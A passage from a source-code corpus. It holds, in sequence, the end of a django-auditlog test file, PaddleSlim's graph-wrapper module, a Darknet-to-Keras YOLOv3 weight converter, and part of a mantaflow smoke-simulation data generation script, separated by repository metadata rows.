self.assertTrue(dtm.history.latest().changes_display_dict["time"][1] == \
dateformat.format(time, settings.TIME_FORMAT),
msg=("The time should be formatted according to Django's settings for"
" TIME_FORMAT unless USE_L10N is True."))
time = datetime.time(6, 0)
dtm.time = time
dtm.save()
self.assertTrue(dtm.history.latest().changes_display_dict["time"][1] == \
dateformat.format(time, settings.TIME_FORMAT),
msg=("The time should be formatted according to Django's settings for"
" TIME_FORMAT unless USE_L10N is True."))
# Change USE_L10N = True
with self.settings(USE_L10N=True, LANGUAGE_CODE='en-GB'):
self.assertTrue(dtm.history.latest().changes_display_dict["time"][1] == \
formats.localize(time),
msg=("The time should be formatted according to Django's settings for"
" USE_L10N is True with a different LANGUAGE_CODE."))
def test_update_naive_dt(self):
timestamp = datetime.datetime(2017, 1, 10, 15, 0, tzinfo=timezone.utc)
date = datetime.date(2017, 1, 10)
time = datetime.time(12, 0)
dtm = DateTimeFieldModel(label='DateTimeField model', timestamp=timestamp, date=date, time=time, naive_dt=self.now)
dtm.save()
# Change with naive field doesnt raise error
dtm.naive_dt = timezone.make_naive(timezone.now(), timezone=timezone.utc)
dtm.save()
class UnregisterTest(TestCase):
def setUp(self):
auditlog.unregister(SimpleModel)
self.obj = SimpleModel.objects.create(text='No history')
def tearDown(self):
# Re-register for future tests
auditlog.register(SimpleModel)
def test_unregister_create(self):
"""Creation is not logged after unregistering."""
# Get the object to work with
obj = self.obj
# Check for log entries
self.assertTrue(obj.history.count() == 0, msg="There are no log entries")
def test_unregister_update(self):
"""Updates are not logged after unregistering."""
# Get the object to work with
obj = self.obj
# Change something
obj.boolean = True
obj.save()
# Check for log entries
self.assertTrue(obj.history.count() == 0, msg="There are no log entries")
def test_unregister_delete(self):
"""Deletion is not logged after unregistering."""
# Get the object to work with
obj = self.obj
# Delete the object
obj.delete()
# Check for log entries
self.assertTrue(LogEntry.objects.count() == 0, msg="There are no log entries")
class ChoicesFieldModelTest(TestCase):
def setUp(self):
self.obj = ChoicesFieldModel.objects.create(
status=ChoicesFieldModel.RED,
multiplechoice=[ChoicesFieldModel.RED, ChoicesFieldModel.YELLOW, ChoicesFieldModel.GREEN],
)
def test_changes_display_dict_single_choice(self):
self.assertTrue(self.obj.history.latest().changes_display_dict["status"][1] == "Red",
msg="The human readable text 'Red' is displayed.")
self.obj.status = ChoicesFieldModel.GREEN
self.obj.save()
self.assertTrue(self.obj.history.latest().changes_display_dict["status"][1] == "Green", msg="The human readable text 'Green' is displayed.")
def test_changes_display_dict_multiplechoice(self):
self.assertTrue(self.obj.history.latest().changes_display_dict["multiplechoice"][1] == "Red, Yellow, Green",
msg="The human readable text 'Red, Yellow, Green' is displayed.")
self.obj.multiplechoice = ChoicesFieldModel.RED
self.obj.save()
self.assertTrue(self.obj.history.latest().changes_display_dict["multiplechoice"][1] == "Red",
msg="The human readable text 'Red' is displayed.")
class CharfieldTextfieldModelTest(TestCase):
def setUp(self):
self.PLACEHOLDER_LONGCHAR = "s" * 255
self.PLACEHOLDER_LONGTEXTFIELD = "s" * 1000
self.obj = CharfieldTextfieldModel.objects.create(
longchar=self.PLACEHOLDER_LONGCHAR,
longtextfield=self.PLACEHOLDER_LONGTEXTFIELD,
)
def test_changes_display_dict_longchar(self):
self.assertTrue(self.obj.history.latest().changes_display_dict["longchar"][1] == \
"{}...".format(self.PLACEHOLDER_LONGCHAR[:140]),
msg="The string should be truncated at 140 characters with an ellipsis at the end.")
SHORTENED_PLACEHOLDER = self.PLACEHOLDER_LONGCHAR[:139]
self.obj.longchar = SHORTENED_PLACEHOLDER
self.obj.save()
self.assertTrue(self.obj.history.latest().changes_display_dict["longchar"][1] == SHORTENED_PLACEHOLDER,
msg="The field should display the entire string because it is less than 140 characters")
def test_changes_display_dict_longtextfield(self):
self.assertTrue(self.obj.history.latest().changes_display_dict["longtextfield"][1] == \
"{}...".format(self.PLACEHOLDER_LONGTEXTFIELD[:140]),
msg="The string should be truncated at 140 characters with an ellipsis at the end.")
SHORTENED_PLACEHOLDER = self.PLACEHOLDER_LONGTEXTFIELD[:139]
self.obj.longtextfield = SHORTENED_PLACEHOLDER
self.obj.save()
self.assertTrue(self.obj.history.latest().changes_display_dict["longtextfield"][1] == SHORTENED_PLACEHOLDER,
msg="The field should display the entire string because it is less than 140 characters")
class PostgresArrayFieldModelTest(TestCase):
databases = '__all__'
def setUp(self):
self.obj = PostgresArrayFieldModel.objects.create(
arrayfield=[PostgresArrayFieldModel.RED, PostgresArrayFieldModel.GREEN],
)
@property
def latest_array_change(self):
return self.obj.history.latest().changes_display_dict["arrayfield"][1]
def test_changes_display_dict_arrayfield(self):
self.assertTrue(self.latest_array_change == "Red, Green",
msg="The human readable text for the two choices, 'Red, Green' is displayed.")
self.obj.arrayfield = [PostgresArrayFieldModel.GREEN]
self.obj.save()
self.assertTrue(self.latest_array_change == "Green",
msg="The human readable text 'Green' is displayed.")
self.obj.arrayfield = []
self.obj.save()
self.assertTrue(self.latest_array_change == "",
msg="The human readable text '' is displayed.")
self.obj.arrayfield = [PostgresArrayFieldModel.GREEN]
self.obj.save()
self.assertTrue(self.latest_array_change == "Green",
msg="The human readable text 'Green' is displayed.")
class CompatibilityTest(TestCase):
"""Test case for compatibility functions."""
def test_is_authenticated(self):
"""Test that the 'is_authenticated' compatibility function is working.
Bit of explanation: the `is_authenticated` property on request.user is
*always* set to 'False' for AnonymousUser, and it is *always* set to
'True' for *any* other (i.e. identified/authenticated) user.
So, the logic of this test is to ensure that compat.is_authenticated()
returns the correct value based on whether or not the User is an
anonymous user (simulating what goes on in the real request.user).
"""
# Test compat.is_authenticated for anonymous users
self.user = auth.get_user(self.client)
if django.VERSION < (1, 10):
assert self.user.is_anonymous()
else:
assert self.user.is_anonymous
assert not compat.is_authenticated(self.user)
# Setup some other user, which is *not* anonymous, and check
# compat.is_authenticated
self.user = User.objects.create(
username="test.user",
email="test.user@mail.com",
password="auditlog"
)
if django.VERSION < (1, 10):
assert not self.user.is_anonymous()
else:
assert not self.user.is_anonymous
assert compat.is_authenticated(self.user)
class AdminPanelTest(TestCase):
@classmethod
def setUpTestData(cls):
cls.username = "test_admin"
cls.password = User.objects.make_random_password()
cls.user, created = User.objects.get_or_create(username=cls.username)
cls.user.set_password(cls.password)
cls.user.is_staff = True
cls.user.is_superuser = True
cls.user.is_active = True
cls.user.save()
cls.obj = SimpleModel.objects.create(text='For admin logentry test')
def test_auditlog_admin(self):
self.client.login(username=self.username, password=self.password)
log_pk = self.obj.history.latest().pk
res = self.client.get("/admin/auditlog/logentry/")
assert res.status_code == 200
res = self.client.get("/admin/auditlog/logentry/add/")
assert res.status_code == 200
res = self.client.get("/admin/auditlog/logentry/{}/".format(log_pk), follow=True)
assert res.status_code == 200
res = self.client.get("/admin/auditlog/logentry/{}/delete/".format(log_pk))
assert res.status_code == 200
res = self.client.get("/admin/auditlog/logentry/{}/history/".format(log_pk))
assert res.status_code == 200
class NoDeleteHistoryTest(TestCase):
def test_delete_related(self):
instance = SimpleModel.objects.create(integer=1)
assert LogEntry.objects.all().count() == 1
instance.integer = 2
instance.save()
assert LogEntry.objects.all().count() == 2
instance.delete()
entries = LogEntry.objects.order_by('id')
# The "DELETE" record is always retained
assert LogEntry.objects.all().count() == 1
assert entries.first().action == LogEntry.Action.DELETE
def test_no_delete_related(self):
instance = NoDeleteHistoryModel.objects.create(integer=1)
self.assertEqual(LogEntry.objects.all().count(), 1)
instance.integer = 2
instance.save()
self.assertEqual(LogEntry.objects.all().count(), 2)
instance.delete()
entries = LogEntry.objects.order_by('id')
self.assertEqual(entries.count(), 3)
self.assertEqual(
list(entries.values_list('action', flat=True)),
[LogEntry.Action.CREATE, LogEntry.Action.UPDATE, LogEntry.Action.DELETE]
)
| 43.763121 | 199 | 0.649402 |
f0fca9336734096ae4c63a992ee89e802a125b3b | 10,715 | py | Python | paddleslim/core/graph_wrapper.py | ZichaoGuo/PaddleSlim | 2550fb4ec86aee6155c1c8a2c9ab174e239918a3 | [
"Apache-2.0"
] | 926 | 2019-12-16T05:06:56.000Z | 2022-03-31T07:22:10.000Z | paddleslim/core/graph_wrapper.py | ZichaoGuo/PaddleSlim | 2550fb4ec86aee6155c1c8a2c9ab174e239918a3 | [
"Apache-2.0"
] | 327 | 2019-12-16T06:04:31.000Z | 2022-03-30T11:08:18.000Z | paddleslim/core/graph_wrapper.py | ZichaoGuo/PaddleSlim | 2550fb4ec86aee6155c1c8a2c9ab174e239918a3 | [
"Apache-2.0"
] | 234 | 2019-12-16T03:12:08.000Z | 2022-03-27T12:59:39.000Z | # Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import copy
import pickle
import numpy as np
from collections import OrderedDict
from collections.abc import Iterable
from paddle.fluid.framework import Program, program_guard, Parameter, Variable
__all__ = ['GraphWrapper', 'VarWrapper', 'OpWrapper']
OPTIMIZER_OPS = [
'momentum',
'lars_momentum',
'adagrad',
'adam',
'adamax',
'dpsgd',
'decayed_adagrad',
'adadelta',
'rmsprop',
]
class VarWrapper(object):
def __init__(self, var, graph):
assert isinstance(var, Variable)
assert isinstance(graph, GraphWrapper)
self._var = var
self._graph = graph
def __eq__(self, v):
"""
Overwrite this function for ...in... syntax in python.
"""
return (v is not None) and self._var.name == v._var.name
def name(self):
"""
Get the name of the variable.
"""
return self._var.name
def __repr__(self):
return self._var.name
def __lt__(self, other):
return self._var.name < other._var.name
def __gt__(self, other):
return self._var.name > other._var.name
def __eq__(self, other):
return self._var.name == other._var.name
def shape(self):
"""
Get the shape of the varibale.
"""
return self._var.shape
def set_shape(self, shape):
"""
Set the shape of the variable.
"""
self._var.desc.set_shape(shape)
def inputs(self):
"""
Get all the operators that use this variable as output.
Returns:
list<OpWrapper>: A list of operators.
"""
ops = []
for op in self._graph.ops():
if self in op.all_outputs():
ops.append(op)
return ops
def outputs(self):
"""
Get all the operators that use this variable as input.
Returns:
list<OpWrapper>: A list of operators.
"""
ops = []
for op in self._graph.ops():
if self in op.all_inputs():
ops.append(op)
return ops
def is_parameter(self):
return isinstance(self._var, Parameter)
class OpWrapper(object):
def __init__(self, op, graph):
assert isinstance(graph, GraphWrapper)
self._op = op
self._graph = graph
def __eq__(self, op):
"""
Overwrite this function for ...in... syntax in python.
"""
return self.idx() == op.idx()
def all_inputs(self):
"""
Get all the input variables of this operator.
"""
return [
self._graph.var(var_name) for var_name in self._op.input_arg_names
]
def all_outputs(self):
"""
Get all the output variables of this operator.
"""
return [
self._graph.var(var_name) for var_name in self._op.output_arg_names
]
def idx(self):
"""
Get the id of this operator.
"""
return self._op.idx
def type(self):
"""
Get the type of this operator.
"""
return self._op.type
def __repr__(self):
return "op[id: {}, type: {}; inputs: {}]".format(self.idx(),
self.type(),
self.all_inputs())
def __lt__(self, other):
return self._op.idx < other._op.idx
def __gt__(self, other):
return self._op.idx > other._op.idx
def __eq__(self, other):
return self._op.idx == other._op.idx
def is_bwd_op(self):
"""
Whether this operator is backward op.
"""
return self.type().endswith('_grad')
def is_opt_op(self):
"""
Whether this operator is optimizer op.
"""
return self.type() in OPTIMIZER_OPS
def inputs(self, name):
"""
Get all the varibales by the input name.
"""
if name in self._op.input_names:
return [
self._graph.var(var_name) for var_name in self._op.input(name)
]
return []
def outputs(self, name):
"""
Get all the varibales by the output name.
"""
if name in self._op.output_names:
return [
self._graph.var(var_name) for var_name in self._op.output(name)
]
return []
def set_attr(self, key, value):
"""
Set the value of attribute by attribute's name.
Args:
key(str): the attribute name.
value(bool|int|str|float|list): the value of the attribute.
"""
self._op._set_attr(key, value)
def attr(self, name):
"""
Get the attribute by name.
Args:
name(str): the attribute name.
Returns:
bool|int|str|float|list: The attribute value. The return value
can be any valid attribute type.
"""
if self._op.has_attr(name):
return self._op.attr(name)
else:
return None
class GraphWrapper(object):
"""
It is a wrapper of paddle.fluid.framework.IrGraph with some special functions
for paddle slim framework.
Args:
program(framework.Program): A program with
in_nodes(dict): A dict to indicate the input nodes of the graph.
The key is user-defined and human-readable name.
The value is the name of Variable.
out_nodes(dict): A dict to indicate the input nodes of the graph.
The key is user-defined and human-readable name.
The value is the name of Variable.
"""
def __init__(self, program=None, in_nodes=[], out_nodes=[]):
"""
"""
super(GraphWrapper, self).__init__()
self.program = Program() if program is None else program
self.persistables = {}
self.teacher_persistables = {}
for var in self.program.list_vars():
if var.persistable:
self.persistables[var.name] = var
self.compiled_graph = None
in_nodes = [] if in_nodes is None else in_nodes
out_nodes = [] if out_nodes is None else out_nodes
self.in_nodes = OrderedDict(in_nodes)
self.out_nodes = OrderedDict(out_nodes)
self._attrs = OrderedDict()
def all_parameters(self):
"""
Get all the parameters in this graph.
Returns:
list<VarWrapper>: A list of VarWrapper instances.
"""
params = []
for block in self.program.blocks:
for param in block.all_parameters():
params.append(VarWrapper(param, self))
return params
def is_parameter(self, var):
"""
Whether the given variable is parameter.
Args:
var(VarWrapper): The given varibale.
"""
return isinstance(var._var, Parameter)
def is_persistable(self, var):
"""
Whether the given variable is persistable.
Args:
var(VarWrapper): The given varibale.
"""
return var._var.persistable
def ops(self):
"""
Return all operator nodes included in the graph as a set.
"""
ops = []
for block in self.program.blocks:
for op in block.ops:
ops.append(OpWrapper(op, self))
return ops
def vars(self):
"""
Get all the variables.
"""
return [VarWrapper(var, self) for var in self.program.list_vars()]
def var(self, name):
"""
Get the variable by variable name.
"""
for block in self.program.blocks:
if block.has_var(name):
return VarWrapper(block.var(name), self)
return None
def clone(self, for_test=False):
"""
Clone a new graph from current graph.
Returns:
(GraphWrapper): The wrapper of a new graph.
"""
return GraphWrapper(
self.program.clone(for_test),
copy.deepcopy(self.in_nodes), copy.deepcopy(self.out_nodes))
def program(self):
"""
Get the program in current wrapper.
"""
return self.program
def pre_ops(self, op):
"""
Get all the previous operators of target operator.
Args:
op(OpWrapper): Target operator.
Returns:
list<OpWrapper>: A list of operators.
"""
ops = []
for p in self.ops():
for in_var in op.all_inputs():
if in_var in p.all_outputs():
ops.append(p)
return ops
def next_ops(self, op):
"""
Get all the next operators of target operator.
Args:
op(OpWrapper): Target operator.
Returns:
list<OpWrapper>: A list of operators.
"""
ops = []
for p in self.ops():
for out_var in op.all_outputs():
if out_var in p.all_inputs():
ops.append(p)
return ops
def get_param_by_op(self, op):
"""
Get the parameters used by target operator.
"""
assert isinstance(op, OpWrapper)
params = []
for var in op.all_inputs():
if isinstance(var._var, Parameter):
params.append(var)
assert len(params) > 0
return params
def numel_params(self):
"""
Get the number of elements in all parameters.
"""
ret = 0
for param in self.all_parameters():
ret += np.product(param.shape())
return ret
def infer_shape(self):
"""
Update the groups of convolution layer according to current filters.
It is used after loading pruned parameters from file.
"""
for op in self.ops():
if op.type() != 'conditional_block':
op._op.desc.infer_shape(op._op.block.desc)
| 27.334184 | 81 | 0.55399 |
bb66fe3bab18e509025676957911cbd8f8be6a93 | 10,210 | py | Python | convert.py | aturX/yolo3-keras-start | f473e9f2ad32745e19509b738f2651119aee449b | [
"MIT"
] | null | null | null | convert.py | aturX/yolo3-keras-start | f473e9f2ad32745e19509b738f2651119aee449b | [
"MIT"
] | null | null | null | convert.py | aturX/yolo3-keras-start | f473e9f2ad32745e19509b738f2651119aee449b | [
"MIT"
] | null | null | null | #! /usr/bin/env python
"""
Reads Darknet config and weights and creates Keras model with TF backend.
"""
import argparse
import configparser
import io
import os
from collections import defaultdict
import numpy as np
from keras import backend as K
from keras.layers import (Conv2D, Input, ZeroPadding2D, Add,
UpSampling2D, MaxPooling2D, Concatenate)
from keras.layers.advanced_activations import LeakyReLU
from keras.layers.normalization import BatchNormalization
from keras.models import Model
from keras.regularizers import l2
from keras.utils.vis_utils import plot_model as plot
parser = argparse.ArgumentParser(description='Darknet To Keras Converter.')
parser.add_argument('--config_path', default='yolov3.cfg',help='Path to Darknet cfg file.')
parser.add_argument('--weights_path', default='model_data/yolov3.weights',help='Path to Darknet weights file.')
parser.add_argument('--output_path', default='model_data/yolo_weights.h5',help='Path to output Keras model file.')
parser.add_argument(
'-p',
'--plot_model',
help='Plot generated Keras model and save as image.',
action='store_true')
parser.add_argument(
'-w',
'--weights_only',
help='Save as Keras weights file instead of model file.',
action='store_true')
def unique_config_sections(config_file):
"""Convert all config sections to have unique names.
Adds unique suffixes to config sections for compability with configparser.
"""
section_counters = defaultdict(int)
output_stream = io.StringIO()
with open(config_file,encoding='utf-8') as fin:
for line in fin:
if line.startswith('['):
section = line.strip().strip('[]')
_section = section + '_' + str(section_counters[section])
section_counters[section] += 1
line = line.replace(section, _section)
output_stream.write(line)
output_stream.seek(0)
return output_stream
# %%
def _main(args):
config_path = os.path.expanduser(args.config_path)
weights_path = os.path.expanduser(args.weights_path)
assert config_path.endswith('.cfg'), '{} is not a .cfg file'.format(
config_path)
assert weights_path.endswith(
'.weights'), '{} is not a .weights file'.format(weights_path)
output_path = os.path.expanduser(args.output_path)
assert output_path.endswith(
'.h5'), 'output path {} is not a .h5 file'.format(output_path)
output_root = os.path.splitext(output_path)[0]
# Load weights and config.
print('Loading weights.')
weights_file = open(weights_path, 'rb')
major, minor, revision = np.ndarray(
shape=(3, ), dtype='int32', buffer=weights_file.read(12))
if (major*10+minor)>=2 and major<1000 and minor<1000:
seen = np.ndarray(shape=(1,), dtype='int64', buffer=weights_file.read(8))
else:
seen = np.ndarray(shape=(1,), dtype='int32', buffer=weights_file.read(4))
print('Weights Header: ', major, minor, revision, seen)
print('Parsing Darknet config.')
unique_config_file = unique_config_sections(config_path)
cfg_parser = configparser.ConfigParser()
cfg_parser.read_file(unique_config_file)
print('Creating Keras model.')
input_layer = Input(shape=(None, None, 3))
prev_layer = input_layer
all_layers = []
weight_decay = float(cfg_parser['net_0']['decay']
) if 'net_0' in cfg_parser.sections() else 5e-4
count = 0
out_index = []
for section in cfg_parser.sections():
print('Parsing section {}'.format(section))
if section.startswith('convolutional'):
filters = int(cfg_parser[section]['filters'])
size = int(cfg_parser[section]['size'])
stride = int(cfg_parser[section]['stride'])
pad = int(cfg_parser[section]['pad'])
activation = cfg_parser[section]['activation']
batch_normalize = 'batch_normalize' in cfg_parser[section]
padding = 'same' if pad == 1 and stride == 1 else 'valid'
# Setting weights.
# Darknet serializes convolutional weights as:
# [bias/beta, [gamma, mean, variance], conv_weights]
prev_layer_shape = K.int_shape(prev_layer)
weights_shape = (size, size, prev_layer_shape[-1], filters)
darknet_w_shape = (filters, weights_shape[2], size, size)
weights_size = np.product(weights_shape)
print('conv2d', 'bn'
if batch_normalize else ' ', activation, weights_shape)
conv_bias = np.ndarray(
shape=(filters, ),
dtype='float32',
buffer=weights_file.read(filters * 4))
count += filters
if batch_normalize:
bn_weights = np.ndarray(
shape=(3, filters),
dtype='float32',
buffer=weights_file.read(filters * 12))
count += 3 * filters
bn_weight_list = [
bn_weights[0], # scale gamma
conv_bias, # shift beta
bn_weights[1], # running mean
bn_weights[2] # running var
]
conv_weights = np.ndarray(
shape=darknet_w_shape,
dtype='float32',
buffer=weights_file.read(weights_size * 4))
count += weights_size
# DarkNet conv_weights are serialized Caffe-style:
# (out_dim, in_dim, height, width)
# We would like to set these to Tensorflow order:
# (height, width, in_dim, out_dim)
conv_weights = np.transpose(conv_weights, [2, 3, 1, 0])
conv_weights = [conv_weights] if batch_normalize else [
conv_weights, conv_bias
]
# Handle activation.
act_fn = None
if activation == 'leaky':
pass # Add advanced activation later.
elif activation != 'linear':
raise ValueError(
'Unknown activation function `{}` in section {}'.format(
activation, section))
# Create Conv2D layer
if stride>1:
# Darknet uses left and top padding instead of 'same' mode
prev_layer = ZeroPadding2D(((1,0),(1,0)))(prev_layer)
conv_layer = (Conv2D(
filters, (size, size),
strides=(stride, stride),
kernel_regularizer=l2(weight_decay),
use_bias=not batch_normalize,
weights=conv_weights,
activation=act_fn,
padding=padding))(prev_layer)
if batch_normalize:
conv_layer = (BatchNormalization(
weights=bn_weight_list))(conv_layer)
prev_layer = conv_layer
if activation == 'linear':
all_layers.append(prev_layer)
elif activation == 'leaky':
act_layer = LeakyReLU(alpha=0.1)(prev_layer)
prev_layer = act_layer
all_layers.append(act_layer)
elif section.startswith('route'):
ids = [int(i) for i in cfg_parser[section]['layers'].split(',')]
layers = [all_layers[i] for i in ids]
if len(layers) > 1:
print('Concatenating route layers:', layers)
concatenate_layer = Concatenate()(layers)
all_layers.append(concatenate_layer)
prev_layer = concatenate_layer
else:
skip_layer = layers[0] # only one layer to route
all_layers.append(skip_layer)
prev_layer = skip_layer
elif section.startswith('maxpool'):
size = int(cfg_parser[section]['size'])
stride = int(cfg_parser[section]['stride'])
all_layers.append(
MaxPooling2D(
pool_size=(size, size),
strides=(stride, stride),
padding='same')(prev_layer))
prev_layer = all_layers[-1]
elif section.startswith('shortcut'):
index = int(cfg_parser[section]['from'])
activation = cfg_parser[section]['activation']
assert activation == 'linear', 'Only linear activation supported.'
all_layers.append(Add()([all_layers[index], prev_layer]))
prev_layer = all_layers[-1]
elif section.startswith('upsample'):
stride = int(cfg_parser[section]['stride'])
assert stride == 2, 'Only stride=2 supported.'
all_layers.append(UpSampling2D(stride)(prev_layer))
prev_layer = all_layers[-1]
elif section.startswith('yolo'):
out_index.append(len(all_layers)-1)
all_layers.append(None)
prev_layer = all_layers[-1]
elif section.startswith('net'):
pass
else:
raise ValueError(
'Unsupported section header type: {}'.format(section))
# Create and save model.
if len(out_index)==0: out_index.append(len(all_layers)-1)
model = Model(inputs=input_layer, outputs=[all_layers[i] for i in out_index])
print(model.summary())
if args.weights_only:
model.save_weights('{}'.format(output_path))
print('Saved Keras weights to {}'.format(output_path))
else:
model.save('{}'.format(output_path))
print('Saved Keras model to {}'.format(output_path))
# Check to see if all weights have been read.
remaining_weights = len(weights_file.read()) / 4
weights_file.close()
print('Read {} of {} from Darknet weights.'.format(count, count +
remaining_weights))
if remaining_weights > 0:
print('Warning: {} unused weights'.format(remaining_weights))
if args.plot_model:
plot(model, to_file='{}.png'.format(output_root), show_shapes=True)
print('Saved model plot to {}.png'.format(output_root))
if __name__ == '__main__':
_main(parser.parse_args())
| 38.821293 | 114 | 0.596082 |
70a0a25b5c28ff109eba89e22cdb59d9b9f82263 | 9,111 | py | Python | tensorflow/example1_smoke_tiled/manta_genSimData.py | spockthegray/mantaflow | df72cf235e14ef4f3f8fac9141b5e0a8707406b3 | [
"Apache-2.0"
] | 158 | 2018-06-24T17:42:13.000Z | 2022-03-12T13:29:43.000Z | tensorflow/example1_smoke_tiled/manta_genSimData.py | spockthegray/mantaflow | df72cf235e14ef4f3f8fac9141b5e0a8707406b3 | [
"Apache-2.0"
] | 5 | 2018-09-05T07:30:48.000Z | 2020-07-01T08:56:28.000Z | tensorflow/example1_smoke_tiled/manta_genSimData.py | spockthegray/mantaflow | df72cf235e14ef4f3f8fac9141b5e0a8707406b3 | [
"Apache-2.0"
] | 35 | 2018-06-13T04:05:42.000Z | 2022-03-29T16:55:24.000Z | #******************************************************************************
#
# Double sim data generation
# (note, no blur when transferring hi->lo at the moment)
#
#******************************************************************************
from manta import *
import os, shutil, math, sys, time
import numpy as np
sys.path.append("../tools")
import paramhelpers as ph
# Main params ----------------------------------------------------------------------#
steps = 200
savedata = True
saveppm = False
simNo = 1000 # start ID
showGui = 0
basePath = '../data/'
npSeedstr = "-1"
res = 64
# debugging
#steps = 50 # shorter test
#savedata = False # debug , dont write...
#showGui = 1
basePath = ph.getParam( "basePath", basePath )
npSeedstr = ph.getParam( "npSeed" , npSeedstr )
simNo = int(ph.getParam( "simNo" , simNo ))
res = int(ph.getParam( "res" , res ))
steps = int(ph.getParam( "steps" , steps ))
npSeed = int(npSeedstr)
ph.checkUnusedParams()
# Scene settings ---------------------------------------------------------------------#
setDebugLevel(1)
# Solver params ----------------------------------------------------------------------#
dim = 2
offset = 20
interval = 1
scaleFactor = 4
sm_gs = vec3(res,res,res)
xl_gs = sm_gs * float(scaleFactor)
if (dim==2): xl_gs.z = sm_gs.z = 1 # 2D
#buoy = vec3(0,-9e-4,0)
buoy = vec3(0,-1e-3,0)
xl_buoy = buoy * vec3(1./scaleFactor)
velOffset = vec3(0.)
xl_velOffset = vec3(0.)
# wlt Turbulence input fluid
sm = Solver(name='smaller', gridSize = sm_gs, dim=dim)
sm.timestep = 0.5
# wlt Turbulence output fluid
xl = Solver(name='larger', gridSize = xl_gs, dim=dim)
xl.timestep = sm.timestep
# Simulation Grids -------------------------------------------------------------------#
flags = sm.create(FlagGrid)
vel = sm.create(MACGrid)
velTmp = sm.create(MACGrid)
density = sm.create(RealGrid)
pressure = sm.create(RealGrid)
xl_flags = xl.create(FlagGrid)
xl_vel = xl.create(MACGrid)
xl_velTmp = xl.create(MACGrid)
xl_blurvel = xl.create(MACGrid)
xl_density = xl.create(RealGrid)
xl_blurden = xl.create(RealGrid)
xl_pressure= xl.create(RealGrid)
# open boundaries
bWidth=1
flags.initDomain(boundaryWidth=bWidth)
flags.fillGrid()
xl_flags.initDomain(boundaryWidth=bWidth)
xl_flags.fillGrid()
setOpenBound(flags, bWidth,'yY',FlagOutflow|FlagEmpty)
setOpenBound(xl_flags, bWidth,'yY',FlagOutflow|FlagEmpty)
# inflow sources ----------------------------------------------------------------------#
if(npSeed>0): np.random.seed(npSeed)
# init random density
noise = []
sources = []
noiseN = 12
nseeds = np.random.randint(10000,size=noiseN)
cpos = vec3(0.5,0.5,0.5)
randoms = np.random.rand(noiseN, 8)
for nI in range(noiseN):
noise.append( sm.create(NoiseField, fixedSeed= int(nseeds[nI]), loadFromFile=True) )
noise[nI].posScale = vec3( res * 0.1 * (randoms[nI][7] + 1) )
noise[nI].clamp = True
noise[nI].clampNeg = 0
noise[nI].clampPos = 1.0
noise[nI].valScale = 1.0
noise[nI].valOffset = -0.01 # some gap
noise[nI].timeAnim = 0.3
noise[nI].posOffset = vec3(1.5)
# random offsets
coff = vec3(0.4) * (vec3( randoms[nI][0], randoms[nI][1], randoms[nI][2] ) - vec3(0.5))
radius_rand = 0.035 + 0.035 * randoms[nI][3]
upz = vec3(0.95)+ vec3(0.1) * vec3( randoms[nI][4], randoms[nI][5], randoms[nI][6] )
if(dim == 2):
coff.z = 0.0
upz.z = 1.0
if( nI%2 == 0 ):
sources.append(xl.create(Cylinder, center=xl_gs*(cpos+coff), radius=xl_gs.x*radius_rand, \
z=xl_gs*radius_rand*upz))
else:
sources.append(xl.create(Sphere, center=xl_gs*(cpos+coff), radius=xl_gs.x*radius_rand, scale=upz))
print (nI, "centre", xl_gs*(cpos+coff), "radius", xl_gs.x*radius_rand, "other", upz )
densityInflow( flags=xl_flags, density=xl_density, noise=noise[nI], shape=sources[nI], scale=1.0, sigma=1.0 )
# init random velocity
Vrandom = np.random.rand(3)
v1pos = vec3(0.7 + 0.4 *(Vrandom[0] - 0.5) ) #range(0.5,0.9)
v2pos = vec3(0.3 + 0.4 *(Vrandom[1] - 0.5) ) #range(0.1,0.5)
vtheta = Vrandom[2] * math.pi * 0.5
velInflow = 0.04 * vec3(math.sin(vtheta), math.cos(vtheta), 0)
if(dim == 2):
v1pos.z = v2pos.z = 0.5
xl_sourcV1 = xl.create(Sphere, center=xl_gs*v1pos, radius=xl_gs.x*0.1, scale=vec3(1))
xl_sourcV2 = xl.create(Sphere, center=xl_gs*v2pos, radius=xl_gs.x*0.1, scale=vec3(1))
xl_sourcV1.applyToGrid( grid=xl_vel , value=(-velInflow*float(xl_gs.x)) )
xl_sourcV2.applyToGrid( grid=xl_vel , value=( velInflow*float(xl_gs.x)) )
elif(dim == 3):
VrandomMore = np.random.rand(3)
vtheta2 = VrandomMore[0] * math.pi * 0.5
vtheta3 = VrandomMore[1] * math.pi * 0.5
vtheta4 = VrandomMore[2] * math.pi * 0.5
for dz in range(1,10,1):
v1pos.z = v2pos.z = (0.1*dz)
vtheta_xy = vtheta *(1.0 - 0.1*dz ) + vtheta2 * (0.1*dz)
vtheta_z = vtheta3 *(1.0 - 0.1*dz ) + vtheta4 * (0.1*dz)
velInflow = 0.04 * vec3( math.cos(vtheta_z) * math.sin(vtheta_xy), math.cos(vtheta_z) * math.cos(vtheta_xy), math.sin(vtheta_z))
xl_sourcV1 = xl.create(Sphere, center=xl_gs*v1pos, radius=xl_gs.x*0.1, scale=vec3(1))
xl_sourcV2 = xl.create(Sphere, center=xl_gs*v2pos, radius=xl_gs.x*0.1, scale=vec3(1))
xl_sourcV1.applyToGrid( grid=xl_vel , value=(-velInflow*float(xl_gs.x)) )
xl_sourcV2.applyToGrid( grid=xl_vel , value=( velInflow*float(xl_gs.x)) )
blurSig = float(scaleFactor) / 3.544908 # 3.544908 = 2 * sqrt( PI )
xl_blurden.copyFrom( xl_density )
# todo blurRealGrid( xl_density, xl_blurden, blurSig)
interpolateGrid( target=density, source=xl_blurden )
xl_blurvel.copyFrom( xl_vel )
# todo blurMacGrid( xl_vel, xl_blurvel, blurSig)
interpolateMACGrid( target=vel, source=xl_blurvel )
vel.multConst( vec3(1./scaleFactor) )
printBuildInfo()
# Setup UI ---------------------------------------------------------------------#
if (showGui and GUI):
gui=Gui()
gui.show()
gui.pause()
if savedata:
simPath, simNo = ph.getNextSimPath(simNo, basePath)
sys.stdout = ph.Logger(simPath)
t = 0
resetN = 20
# main loop --------------------------------------------------------------------#
while t < steps+offset:
curt = t * sm.timestep
mantaMsg( "Current time t: " + str(curt) +" \n" )
newCentre = calcCenterOfMass(xl_density)
